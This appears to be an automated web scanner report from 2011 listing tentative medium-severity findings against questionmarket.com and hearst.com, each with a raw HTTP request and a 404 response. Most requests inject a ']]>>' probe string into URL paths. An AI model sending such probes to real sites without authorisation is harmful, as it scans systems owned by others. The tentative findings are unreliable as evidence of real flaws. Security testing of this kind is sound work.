HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:41:11 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Content-Type: text/html Content-Language: en Content-Length: 1198 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://amch.question |
Path: | /adscgen/dynamiclink.js |
GET /adscgen/dynamiclink.js Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://www.kaboodle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CS1=931683-4-1_20021 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:41:11 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Content-Type: text/html Content-Language: en Content-Length: 1198 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://amch.question |
Path: | /adscgen/st.php |
GET /adscgen]]>>/st.php?survey_num=926534 Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CS1=931683-4-1_20021 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:41:09 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Content-Type: text/html Content-Language: en Content-Length: 1200 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://amch.question |
Path: | /adscgen/st.php |
GET /adscgen/st.php]]>>?survey_num=926534&site Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CS1=931683-4-1_20021 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:41:09 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Content-Type: text/html Content-Language: en Content-Length: 1200 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://amch.question |
Path: | /dt/s/28067/0.php |
GET /dt]]>>/s/28067/0.php?rnd=0 Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://www.kaboodle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CS1=931683-4-1_20021 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:38:52 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Content-Type: text/html Content-Language: en Content-Length: 1198 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://amch.question |
Path: | /dt/s/28067/0.php |
GET /dt/s]]>>/28067/0.php?rnd=0 Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://www.kaboodle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CS1=931683-4-1_20021 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:38:53 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Content-Type: text/html Content-Language: en Content-Length: 1198 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://amch.question |
Path: | /dt/s/28067/0.php |
GET /dt/s/28067]]>>/0.php?rnd=0.8592109 Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://www.kaboodle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CS1=931683-4-1_20021 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:38:53 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Content-Type: text/html Content-Language: en Content-Length: 1198 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://amch.question |
Path: | /dt/s/28067/0.php |
GET /dt/s/28067/0.php]]>>?rnd=0.8592109645251185 HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://www.kaboodle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CS1=931683-4-1_20021 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:38:54 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Content-Type: text/html Content-Language: en Content-Length: 1198 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://amch.question |
Path: | /static/1000_arrow |
GET /static]]>>/1000_arrow_safecount_li Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://www.kaboodle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CS1=931683-4-1_20021 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:39:56 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Content-Type: text/html Content-Language: en Content-Length: 1198 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://amch.question |
Path: | /static/1000_arrow |
GET /static/1000_arrow Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://www.kaboodle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CS1=931683-4-1_20021 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:39:57 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Content-Type: text/html Content-Language: en Content-Length: 1198 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://hearst.com |
Path: | /about-hearst/corporate |
GET /about-hearst]]>>/corporate-george-r Host: hearst.com Proxy-Connection: keep-alive Referer: http://hearst.com/about User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:23:27 GMT Server: Apache/2.2.3 (Linux/SUSE) Vary: accept-language,accept Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1207 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://hearst.com |
Path: | /about-hearst/corporate |
GET /about-hearst/corporate Host: hearst.com Proxy-Connection: keep-alive Referer: http://hearst.com/about User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:23:30 GMT Server: Apache/2.2.3 (Linux/SUSE) Vary: accept-language,accept Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1207 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://hearst.com |
Path: | /about-hearst/corporate |
GET /about-hearst]]>>/corporate-mark-e-aldam Host: hearst.com Proxy-Connection: keep-alive Referer: http://hearst.com/about User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:23:30 GMT Server: Apache/2.2.3 (Linux/SUSE) Vary: accept-language,accept Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1253 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://hearst.com |
Path: | /about-hearst/corporate |
GET /about-hearst/corporate Host: hearst.com Proxy-Connection: keep-alive Referer: http://hearst.com/about User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:23:33 GMT Server: Apache/2.2.3 (Linux/SUSE) Vary: accept-language,accept Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1253 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://hearst.com |
Path: | /about-hearst/index.php |
GET /about-hearst]]>>/index.php HTTP/1.1 Host: hearst.com Proxy-Connection: keep-alive Referer: http://hearst.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:23:11 GMT Server: Apache/2.2.3 (Linux/SUSE) Vary: accept-language,accept Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1163 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://hearst.com |
Path: | /about-hearst/index.php |
GET /about-hearst/index.php]]>> HTTP/1.1 Host: hearst.com Proxy-Connection: keep-alive Referer: http://hearst.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:23:15 GMT Server: Apache/2.2.3 (Linux/SUSE) Vary: accept-language,accept Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1163 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://hearst.com |
Path: | /flash/slideshow |
GET /flash]]>>/slideshow-newspapers.swf HTTP/1.1 Host: hearst.com Proxy-Connection: keep-alive Referer: http://hearst.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:24:31 GMT Server: Apache/2.2.3 (Linux/SUSE) Vary: accept-language,accept Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1203 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://hearst.com |
Path: | /flash/slideshow |
GET /flash/slideshow Host: hearst.com Proxy-Connection: keep-alive Referer: http://hearst.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:24:35 GMT Server: Apache/2.2.3 (Linux/SUSE) Vary: accept-language,accept Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1203 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://hearst.com |
Path: | /newspapers/albany-times |
GET /newspapers]]>>/albany-times-union.php HTTP/1.1 Host: hearst.com Proxy-Connection: keep-alive Referer: http://hearst.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:24:21 GMT Server: Apache/2.2.3 (Linux/SUSE) Vary: accept-language,accept Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1217 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://hearst.com |
Path: | /newspapers/albany-times |
GET /newspapers/albany-times Host: hearst.com Proxy-Connection: keep-alive Referer: http://hearst.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:24:25 GMT Server: Apache/2.2.3 (Linux/SUSE) Vary: accept-language,accept Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1217 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://hearst.com |
Path: | /newspapers/hearst-news |
GET /newspapers]]>>/hearst-news-service.php HTTP/1.1 Host: hearst.com Proxy-Connection: keep-alive Referer: http://hearst.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:24:43 GMT Server: Apache/2.2.3 (Linux/SUSE) Vary: accept-language,accept Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1217 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://hearst.com |
Path: | /newspapers/hearst-news |
GET /newspapers/hearst-news Host: hearst.com Proxy-Connection: keep-alive Referer: http://hearst.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:24:46 GMT Server: Apache/2.2.3 (Linux/SUSE) Vary: accept-language,accept Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1217 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://hearst.com |
Path: | /newspapers/index.php |
GET /newspapers]]>>/index.php HTTP/1.1 Host: hearst.com Proxy-Connection: keep-alive Referer: http://hearst.com/press User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:24:03 GMT Server: Apache/2.2.3 (Linux/SUSE) Vary: accept-language,accept Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1203 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://hearst.com |
Path: | /newspapers/index.php |
GET /newspapers/index.php]]>> HTTP/1.1 Host: hearst.com Proxy-Connection: keep-alive Referer: http://hearst.com/press User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:24:10 GMT Server: Apache/2.2.3 (Linux/SUSE) Vary: accept-language,accept Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1203 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://hearst.com |
Path: | /newspapers/localedge.php |
GET /newspapers]]>>/localedge.php HTTP/1.1 Host: hearst.com Proxy-Connection: keep-alive Referer: http://hearst.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:24:57 GMT Server: Apache/2.2.3 (Linux/SUSE) Vary: accept-language,accept Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1231 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://hearst.com |
Path: | /newspapers/localedge.php |
GET /newspapers/localedge.php]]>> HTTP/1.1 Host: hearst.com Proxy-Connection: keep-alive Referer: http://hearst.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:25:03 GMT Server: Apache/2.2.3 (Linux/SUSE) Vary: accept-language,accept Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1231 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://hearst.com |
Path: | /newspapers/metrix4media |
GET /newspapers]]>>/metrix4media.php HTTP/1.1 Host: hearst.com Proxy-Connection: keep-alive Referer: http://hearst.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:27:33 GMT Server: Apache/2.2.3 (Linux/SUSE) Vary: accept-language,accept Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1211 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://hearst.com |
Path: | /newspapers/metrix4media |
GET /newspapers/metrix4media Host: hearst.com Proxy-Connection: keep-alive Referer: http://hearst.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:27:36 GMT Server: Apache/2.2.3 (Linux/SUSE) Vary: accept-language,accept Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1211 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://hearst.com |
Path: | /newspapers/seattlepicom |
GET /newspapers]]>>/seattlepicom.php HTTP/1.1 Host: hearst.com Proxy-Connection: keep-alive Referer: http://hearst.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:24:36 GMT Server: Apache/2.2.3 (Linux/SUSE) Vary: accept-language,accept Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1229 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://hearst.com |
Path: | /newspapers/seattlepicom |
GET /newspapers/seattlepicom Host: hearst.com Proxy-Connection: keep-alive Referer: http://hearst.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:24:39 GMT Server: Apache/2.2.3 (Linux/SUSE) Vary: accept-language,accept Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1229 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://hearst.com |
Path: | /newspapers/the-advocate |
GET /newspapers]]>>/the-advocate.php HTTP/1.1 Host: hearst.com Proxy-Connection: keep-alive Referer: http://hearst.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:24:03 GMT Server: Apache/2.2.3 (Linux/SUSE) Vary: accept-language,accept Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1203 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
